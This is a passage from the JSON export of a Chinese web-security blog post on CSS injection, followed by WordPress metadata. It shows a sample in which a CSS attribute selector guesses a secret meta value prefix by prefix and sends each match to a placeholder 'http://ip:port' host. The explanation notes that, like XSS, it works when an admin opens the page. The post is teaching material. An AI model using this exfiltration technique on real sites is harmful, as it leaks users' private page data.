#1E754F\">title<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">meta<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">name<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">secret<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">content<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">flag<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">style<\/span><span style=\"color: #999999\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #1E754F\">meta<\/span><span style=\"color: #999999\">{<\/span><span style=\"color: #393A34\">&#91;<\/span><span style=\"color: #998418\">name<\/span><span style=\"color: #393A34\">=&quot;<\/span><span style=\"color: #998418\">secret<\/span><span style=\"color: #393A34\">&quot;&#93;&#91;<\/span><span style=\"color: #998418\">content<\/span><span style=\"color: #393A34\">^=&quot;<\/span><span style=\"color: #998418\">fl<\/span><span style=\"color: #393A34\">&quot;&#93;<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #998418\">background<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #998418\">url<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">http:\/\/ip:port?fl<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  <\/span><span style=\"color: #999999\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0      &lt;\/<\/span><span style=\"color: #1E754F\">style<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;\/<\/span><span style=\"color: #1E754F\">head<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;<\/span><span style=\"color: #1E754F\">body<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0  &lt;<\/span><span style=\"color: #1E754F\">h1<\/span><span style=\"color: #AB5959\">&gt;<\/span><span style=\"color: #393A34\">Hello!&lt;\/<\/span><span style=\"color: #1E754F\">h1<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0  &lt;\/<\/span><span style=\"color: #1E754F\">body<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">&lt;\/<\/span><span style=\"color: #1E754F\">html<\/span><span style=\"color: #AB5959\">&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">HTML<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c31\u80fd\u9010\u6b65\u7684\u6cc4\u9732\u51fa\u5b8c\u6574\u7684 content \u5c5e\u6027\u503c\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u59ff\u52bf\u7684\u5b9e\u73b0\u524d\u63d0\u548c xss \u662f\u4e00\u6837\u7684\uff0c\u5982\u679c\u8981\u7a83\u53d6\u7684\u662f\u7ba1\u7406\u5458\u7528\u6237\u9875\u9762\u4e2d\u7684\u4fe1\u606f\uff0c\u9700\u8981\u7ba1\u7406\u5458\u7528\u6237\u4e3b\u52a8\u8fd0\u884c\u8fd9\u6bb5\u4ee3\u7801\uff08\u6253\u5f00\u8fd9\u4e2a\u7f51\u9875\uff09\u624d\u884c\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"\u5148\u660e\u786e\u4e00\u4e0b\u8fd9\u4e2a\u6f0f\u6d1e\u80fd\u5b9e\u73b0\u7684\u6548\u679c \u2014\u2014 \u6cc4\u9732\u9875\u9762\u91cc\u53ef\u88ab CSS \u5c5e\u6027\u9009\u62e9\u5668\u8bbf\u95ee\u7684 HTML \u5c5e\u6027\u5185\u5bb9\u3002 \u8fd9\u4e2a\u653b\u51fb\u624b\u6cd5\u633a\u50cf xss \u7684\uff0c\u4e0d\u8fc7\u6ca1\u6d89\u53ca\u5230 JavaScript\uff0c\u4ec5\u4ec5\u662f\u501f\u52a9 CSS \u548c HTML \u5c31\u5b9e\u73b0\u4e86\u4fe1\u606f\u6cc4\u9732\u3002 CSS\u5c5e\u6027\u9009\u62e9\u5668......","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[23],"tags":[45],"class_list":["post-322","post","type-post","status-publish","format-standard","hentry","category-web-security","tag-css"],"_links":{"self":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/322","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=322"}],"version-history":[{"count":7,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/322\/revisions"}],"predecessor-version":[{"id":512,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/322\/revisions\/512"}],"wp:attachment":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=322"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=322"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=322"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}